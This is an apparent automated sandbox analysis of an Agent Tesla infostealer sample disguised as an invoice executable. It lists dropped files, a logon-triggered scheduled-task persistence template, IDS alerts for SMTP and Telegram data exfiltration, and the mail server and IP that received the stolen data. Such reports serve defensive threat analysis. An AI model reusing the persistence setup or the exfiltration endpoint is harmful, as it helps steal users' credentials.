                                          Entropy (8bit):5.3499841584777394
                                          Encrypted:false
                                          SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84bE4Ks:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                          MD5:4664C2114894A4BFC1E657FC08C72FF4
                                          SHA1:95A1E14E2AD65BCA561261DA3899074BF5276AED
                                          SHA-256:6E36229D13672B4304C696812B365F2E5657875DD0E11F13AE010566CC87607A
                                          SHA-512:4E7862716D5C0BC2174E819BAB329A2974FE83A36D5417EE732AB2F3D77D95620B3D462A1C9608F5FE90A48030140DE53DB642F8C370CD8E191BDBE83C638CA1
                                          Malicious:true
                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                          Process:C:\Users\user\AppData\Roaming\txQleCu.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):1216
                                          Entropy (8bit):5.355304211458859
                                          Encrypted:false
                                          SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                          MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                          SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                          SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                          SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                          Malicious:false
                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):21900
                                          Entropy (8bit):5.599272798882325
                                          Encrypted:false
                                          SSDEEP:384:bYtCR60w4KuihiQ/+sMSBx2jNiiJ9gVSIo3rV1Vm0W1AVrdtss82TA+iuYb:bCJhf/9M4gJSVc73JDob
                                          MD5:90A9DBBCB9C023C3FA5339081410DA65
                                          SHA1:3F0378DB93E07D23F2DD26CF154B7324CD46FEEE
                                          SHA-256:16CFF2718CA61BCF64DDD24185C5319B3D51A16F49CC16B97B804F5464FDDAE6
                                          SHA-512:8C836B4D06A483954CF7FA40766F306D08A04038FE19FB74787C58C9918FAA3FAB77A054206BD428693B4D9C8E15A07C8E9A4AB9F1F1396D41CE488567662472
                                          Malicious:false
                                          Preview:@...e...............................+.n..............@..........H...............<@.^.L."My...:P..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:very short file (no magic)
                                          Category:dropped
                                          Size (bytes):1
                                          Entropy (8bit):0.0
                                          Encrypted:false
                                          SSDEEP:3:U:U
                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                          Malicious:false
                                          Preview:1
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:very short file (no magic)
                                          Category:dropped
                                          Size (bytes):1
                                          Entropy (8bit):0.0
                                          Encrypted:false
                                          SSDEEP:3:U:U
                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                          Malicious:false
                                          Preview:1
                                          Process:C:\Users\user\AppData\Roaming\txQleCu.exe
                                          File Type:XML 1.0 document, ASCII text
                                          Category:dropped
                                          Size (bytes):1594
                                          Entropy (8bit):5.144574656694575
                                          Encrypted:false
                                          SSDEEP:24:2di4+S2qh/Q1K1y1mokUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtsxvn:cge4MYrFdOFzOzN33ODOiDdKrsuTsv
                                          MD5:9C4FDC87E1E537ABEADB6168F6B1F2B9
                                          SHA1:65A8A9475A9986C191C059140DCB0BE3D191D23C
                                          SHA-256:DF3C80F0AB594B87A5C2A0825DA9910683EEE59042553A2B38EEFCF497D66EC6
                                          SHA-512:507DBB6A5D5696DDE792D88C5D4DB92C1E921385DC3DE882D5C5A77ACEF438654D19E8BDBD4A17A8580578487BBCF7D941E9736EB4E31E1DF8626553B16E89A4
                                          Malicious:false
                                          Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>computer\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>computer\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>computer\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <
                                          Process:C:\Users\user\Desktop\INVOICE_NO._29998172.exe
                                          File Type:XML 1.0 document, ASCII text
                                          Category:dropped
                                          Size (bytes):1594
                                          Entropy (8bit):5.144574656694575
                                          Encrypted:false
                                          SSDEEP:24:2di4+S2qh/Q1K1y1mokUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtsxvn:cge4MYrFdOFzOzN33ODOiDdKrsuTsv
                                          MD5:9C4FDC87E1E537ABEADB6168F6B1F2B9
                                          SHA1:65A8A9475A9986C191C059140DCB0BE3D191D23C
                                          SHA-256:DF3C80F0AB594B87A5C2A0825DA9910683EEE59042553A2B38EEFCF497D66EC6
                                          SHA-512:507DBB6A5D5696DDE792D88C5D4DB92C1E921385DC3DE882D5C5A77ACEF438654D19E8BDBD4A17A8580578487BBCF7D941E9736EB4E31E1DF8626553B16E89A4
                                          Malicious:true
                                          Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>computer\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>computer\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>computer\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <
                                          Process:C:\Users\user\Desktop\INVOICE_NO._29998172.exe
                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):694272
                                          Entropy (8bit):7.757320557135654
                                          Encrypted:false
                                          SSDEEP:12288:4l7z5GoJiGaq5auWZwv3R9uHmVcHRazfsiL7P6g2isejTsuf:a5GoR5aihwHmVcxCj7P6jiH3T
                                          MD5:024997939B7CE9B28382176C0A70CEC8
                                          SHA1:48EF66CBADFFF627B81794AAAB7DB1A6413CB43B
                                          SHA-256:13E98DCBF169F54503A15D9415B086222AE48F2E872C69C9417E56D29F610B85
                                          SHA-512:E8740F7F6943E5B42248F657CFFA7874856549FD44BCB5C0D41FB955FEF8101F057DD410D8078A163F4B4BEAA0648531C048C4F5474A00DB8FA923B5D1F672EC
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                          • Antivirus: ReversingLabs, Detection: 25%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....pd..............0..r...$........... ........@.. ....................................@.................................l...O.......4 ..........................t{..T............................................ ............... ..H............text....p... ...r.................. ..`.rsrc...4 ......."...t..............@..@.reloc..............................@..B........................H........K...3......".......p.............................................(....*.0..-.......~....- r...p.....(....o....s...........~....*.~....*.......*.0..........(....rE..p~....o......t....*.0..j........(.....(......+H.{....o..........%.~1....o.....o.....%.~1....o.....o....o*....o....&..X..~/....i2...}....*...0..........s.....s......{....o......{....o....(........+e..{....o......o....o.....o....o....o....(....o......{....o......o....o.....o....o....t....o.......X....~/....i
                                          Process:C:\Users\user\Desktop\INVOICE_NO._29998172.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):26
                                          Entropy (8bit):3.95006375643621
                                          Encrypted:false
                                          SSDEEP:3:ggPYV:rPYV
                                          MD5:187F488E27DB4AF347237FE461A079AD
                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                          Malicious:true
                                          Preview:[ZoneTransfer]....ZoneId=0
                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Entropy (8bit):7.757320557135654
                                          TrID:
                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                          • Win32 Executable (generic) a (10002005/4) 49.75%
                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                          • Windows Screen Saver (13104/52) 0.07%
                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                          File name:INVOICE_NO._29998172.exe
                                          File size:694272
                                          MD5:024997939b7ce9b28382176c0a70cec8
                                          SHA1:48ef66cbadfff627b81794aaab7db1a6413cb43b
                                          SHA256:13e98dcbf169f54503a15d9415b086222ae48f2e872c69c9417e56d29f610b85
                                          SHA512:e8740f7f6943e5b42248f657cffa7874856549fd44bcb5c0d41fb955fef8101f057dd410d8078a163f4b4beaa0648531c048c4f5474a00db8fa923b5d1f672ec
                                          SSDEEP:12288:4l7z5GoJiGaq5auWZwv3R9uHmVcHRazfsiL7P6g2isejTsuf:a5GoR5aihwHmVcxCj7P6jiH3T
                                          TLSH:6CE423D432399817F8B7BBB112112E700BA53E957428EBDA9DC6239F16D3F42920770B
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....pd..............0..r...$........... ........@.. ....................................@................................
                                          Icon Hash:f3c6f37969f3c632
                                          Entrypoint:0x4a90be
                                          Entrypoint Section:.text
                                          Digitally signed:false
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                          Time Stamp:0x64701883 [Fri May 26 02:25:07 2023 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:4
                                          OS Version Minor:0
                                          File Version Major:4
                                          File Version Minor:0
                                          Subsystem Version Major:4
                                          Subsystem Version Minor:0
                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                          Instruction
                                          jmp dword ptr [00402000h]
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          NameVirtual AddressVirtual Size Is in Section
                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xa906c0x4f.text
                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xaa0000x2034.rsrc
                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0xae0000xc.reloc
                                          IMAGE_DIRECTORY_ENTRY_DEBUG0xa7b740x54.text
                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                          .text0x20000xa70c40xa7200False0.9075968820119671data7.762983884529855IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                          .rsrc0xaa0000x20340x2200False0.8100873161764706data7.232131154050627IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .reloc0xae0000xc0x200False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                          NameRVASizeTypeLanguageCountry
                                          RT_ICON0xaa1000x1ac1PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                          RT_GROUP_ICON0xabbd40x14data
                                          RT_VERSION0xabbf80x23cdata
                                          RT_MANIFEST0xabe440x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                          DLLImport
                                          mscoree.dll_CorExeMain
                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                          192.168.2.35.100.152.24496975872839723 05/26/23-11:30:19.875830TCP2839723ETPRO TROJAN Win32/Agent Tesla SMTP Activity49697587192.168.2.35.100.152.24
                                          192.168.2.35.100.152.24496985872839723 05/26/23-11:30:38.087396TCP2839723ETPRO TROJAN Win32/Agent Tesla SMTP Activity49698587192.168.2.35.100.152.24
                                          192.168.2.35.100.152.24496975872030171 05/26/23-11:30:19.875830TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49697587192.168.2.35.100.152.24
                                          192.168.2.35.100.152.24496985872851779 05/26/23-11:30:38.087497TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49698587192.168.2.35.100.152.24
                                          192.168.2.35.100.152.24496975872840032 05/26/23-11:30:19.875984TCP2840032ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M249697587192.168.2.35.100.152.24
                                          192.168.2.35.100.152.24496985872840032 05/26/23-11:30:38.087497TCP2840032ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M249698587192.168.2.35.100.152.24
                                          192.168.2.35.100.152.24496975872851779 05/26/23-11:30:19.875984TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49697587192.168.2.35.100.152.24
                                          192.168.2.35.100.152.24496985872030171 05/26/23-11:30:38.087396TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49698587192.168.2.35.100.152.24
                                          TimestampSource PortDest PortSource IPDest IP
                                          May 26, 2023 11:30:19.235784054 CEST49697587192.168.2.35.100.152.24
                                          May 26, 2023 11:30:19.264534950 CEST587496975.100.152.24192.168.2.3
                                          May 26, 2023 11:30:19.265422106 CEST49697587192.168.2.35.100.152.24
                                          May 26, 2023 11:30:19.492854118 CEST587496975.100.152.24192.168.2.3
                                          May 26, 2023 11:30:19.493402958 CEST49697587192.168.2.35.100.152.24
                                          May 26, 2023 11:30:19.522346020 CEST587496975.100.152.24192.168.2.3
                                          May 26, 2023 11:30:19.524163961 CEST49697587192.168.2.35.100.152.24
                                          May 26, 2023 11:30:19.553760052 CEST587496975.100.152.24192.168.2.3
                                          May 26, 2023 11:30:19.554203987 CEST49697587192.168.2.35.100.152.24
                                          May 26, 2023 11:30:19.623383045 CEST587496975.100.152.24192.168.2.3
                                          May 26, 2023 11:30:19.733593941 CEST587496975.100.152.24192.168.2.3
                                          May 26, 2023 11:30:19.734699011 CEST49697587192.168.2.35.100.152.24
                                          May 26, 2023 11:30:19.764144897 CEST587496975.100.152.24192.168.2.3
                                          May 26, 2023 11:30:19.764169931 CEST587496975.100.152.24192.168.2.3
                                          May 26, 2023 11:30:19.764425993 CEST49697587192.168.2.35.100.152.24
                                          May 26, 2023 11:30:19.836429119 CEST587496975.100.152.24192.168.2.3
                                          May 26, 2023 11:30:19.844118118 CEST587496975.100.152.24192.168.2.3
                                          May 26, 2023 11:30:19.844368935 CEST49697587192.168.2.35.100.152.24
                                          May 26, 2023 11:30:19.874149084 CEST587496975.100.152.24192.168.2.3
                                          May 26, 2023 11:30:19.874423027 CEST587496975.100.152.24192.168.2.3
                                          May 26, 2023 11:30:19.875829935 CEST49697587192.168.2.35.100.152.24
                                          May 26, 2023 11:30:19.875983953 CEST49697587192.168.2.35.100.152.24
                                          May 26, 2023 11:30:19.876035929 CEST49697587192.168.2.35.100.152.24
                                          May 26, 2023 11:30:19.876096964 CEST49697587192.168.2.35.100.152.24
                                          May 26, 2023 11:30:19.906063080 CEST587496975.100.152.24192.168.2.3
                                          May 26, 2023 11:30:19.910511017 CEST587496975.100.152.24192.168.2.3
                                          May 26, 2023 11:30:20.000235081 CEST49697587192.168.2.35.100.152.24
                                          May 26, 2023 11:30:37.596210957 CEST49698587192.168.2.35.100.152.24
                                          May 26, 2023 11:30:37.624862909 CEST587496985.100.152.24192.168.2.3
                                          May 26, 2023 11:30:37.625017881 CEST49698587192.168.2.35.100.152.24
                                          May 26, 2023 11:30:37.843923092 CEST587496985.100.152.24192.168.2.3
                                          May 26, 2023 11:30:37.844399929 CEST49698587192.168.2.35.100.152.24
                                          May 26, 2023 11:30:37.873491049 CEST587496985.100.152.24192.168.2.3
                                          May 26, 2023 11:30:37.875005007 CEST49698587192.168.2.35.100.152.24
                                          May 26, 2023 11:30:37.904480934 CEST587496985.100.152.24192.168.2.3
                                          May 26, 2023 11:30:37.904998064 CEST49698587192.168.2.35.100.152.24
                                          May 26, 2023 11:30:37.935765028 CEST587496985.100.152.24192.168.2.3
                                          May 26, 2023 11:30:37.936095953 CEST49698587192.168.2.35.100.152.24
                                          May 26, 2023 11:30:37.964807034 CEST587496985.100.152.24192.168.2.3
                                          May 26, 2023 11:30:37.968437910 CEST49698587192.168.2.35.100.152.24
                                          May 26, 2023 11:30:38.037228107 CEST587496985.100.152.24192.168.2.3
                                          May 26, 2023 11:30:38.054229975 CEST587496985.100.152.24192.168.2.3
                                          May 26, 2023 11:30:38.055352926 CEST49698587192.168.2.35.100.152.24
                                          May 26, 2023 11:30:38.083884954 CEST587496985.100.152.24192.168.2.3
                                          May 26, 2023 11:30:38.084300041 CEST587496985.100.152.24192.168.2.3
                                          May 26, 2023 11:30:38.087395906 CEST49698587192.168.2.35.100.152.24
                                          May 26, 2023 11:30:38.087496996 CEST49698587192.168.2.35.100.152.24
                                          May 26, 2023 11:30:38.087590933 CEST49698587192.168.2.35.100.152.24
                                          May 26, 2023 11:30:38.087728024 CEST49698587192.168.2.35.100.152.24
                                          May 26, 2023 11:30:38.116472006 CEST587496985.100.152.24192.168.2.3
                                          May 26, 2023 11:30:38.116847038 CEST587496985.100.152.24192.168.2.3
                                          May 26, 2023 11:30:38.121530056 CEST587496985.100.152.24192.168.2.3
                                          May 26, 2023 11:30:38.277170897 CEST49698587192.168.2.35.100.152.24
                                          May 26, 2023 11:31:59.308639050 CEST49697587192.168.2.35.100.152.24
                                          May 26, 2023 11:31:59.379339933 CEST587496975.100.152.24192.168.2.3
                                          May 26, 2023 11:31:59.540105104 CEST587496975.100.152.24192.168.2.3
                                          May 26, 2023 11:31:59.540402889 CEST49697587192.168.2.35.100.152.24
                                          May 26, 2023 11:31:59.543262005 CEST49697587192.168.2.35.100.152.24
                                          May 26, 2023 11:31:59.571962118 CEST587496975.100.152.24192.168.2.3
                                          TimestampSource PortDest PortSource IPDest IP
                                          May 26, 2023 11:30:19.081937075 CEST5238753192.168.2.38.8.8.8
                                          May 26, 2023 11:30:19.131423950 CEST53523878.8.8.8192.168.2.3
                                          May 26, 2023 11:30:19.144532919 CEST5692453192.168.2.38.8.8.8
                                          May 26, 2023 11:30:19.203860044 CEST53569248.8.8.8192.168.2.3
                                          May 26, 2023 11:30:37.406291962 CEST6062553192.168.2.38.8.8.8
                                          May 26, 2023 11:30:37.434777975 CEST53606258.8.8.8192.168.2.3
                                          May 26, 2023 11:30:37.544591904 CEST4930253192.168.2.38.8.8.8
                                          May 26, 2023 11:30:37.571331978 CEST53493028.8.8.8192.168.2.3
                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                          May 26, 2023 11:30:19.081937075 CEST192.168.2.38.8.8.80x835dStandard query (0)mail.gimpex-imerys.comA (IP address)IN (0x0001)false
                                          May 26, 2023 11:30:19.144532919 CEST192.168.2.38.8.8.80x7714Standard query (0)mail.gimpex-imerys.comA (IP address)IN (0x0001)false
                                          May 26, 2023 11:30:37.406291962 CEST192.168.2.38.8.8.80x539dStandard query (0)mail.gimpex-imerys.comA (IP address)IN (0x0001)false
                                          May 26, 2023 11:30:37.544591904 CEST192.168.2.38.8.8.80xe6ddStandard query (0)mail.gimpex-imerys.comA (IP address)IN (0x0001)false
                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                          May 26, 2023 11:30:19.131423950 CEST8.8.8.8192.168.2.30x835dNo error (0)mail.gimpex-imerys.comgimpex-imerys.comCNAME (Canonical name)IN (0x0001)false
                                          May 26, 2023 11:30:19.131423950 CEST8.8.8.8192.168.2.30x835dNo error (0)gimpex-imerys.com5.100.152.24A (IP address)IN (0x0001)false
                                          May 26, 2023 11:30:19.203860044 CEST8.8.8.8192.168.2.30x7714No error (0)mail.gimpex-imerys.comgimpex-imerys.comCNAME (Canonical name)IN (0x0001)false
                                          May 26, 2023 11:30:19.203860044 CEST8.8.8.8192.168.2.30x7714No error (0)gimpex-imerys.com5.100.152.24A (IP address)IN (0x0001)false
                                          May 26, 2023 11:30:37.434777975 CEST8.8.8.8192.168.2.30x539dNo error (0)mail.gimpex-imerys.comgimpex-imerys.comCNAME (Canonical name)IN (0x0001)false
                                          May 26, 2023 11:30:37.434777975 CEST8.8.8.8192.168.2.30x539dNo error (0)gimpex-imerys.com5.100.152.24A (IP address)IN (0x0001)false
                                          May 26, 2023 11:30:37.571331978 CEST8.8.8.8192.168.2.30xe6ddNo error (0)mail.gimpex-imerys.comgimpex-imerys.comCNAME (Canonical name)IN (0x0001)false
                                          May 26, 2023 11:30:37.571331978 CEST8.8.8.8192.168.2.30xe6ddNo error (0)gimpex-imerys.com5.100.152.24A (IP address)IN (0x0001)false
                                          TimestampSource PortDest PortSource IPDest IPCommands
                                          May 26, 2023 11:30:19.492854118 CEST587496975.100.152.24192.168.2.3220-cp-uk-1.webhostbox.net ESMTP Exim 4.95 #2 Fri, 26 May 2023 09:30:19 +0000
                                          220-We do not authorize the use of this system to transport unsolicited,
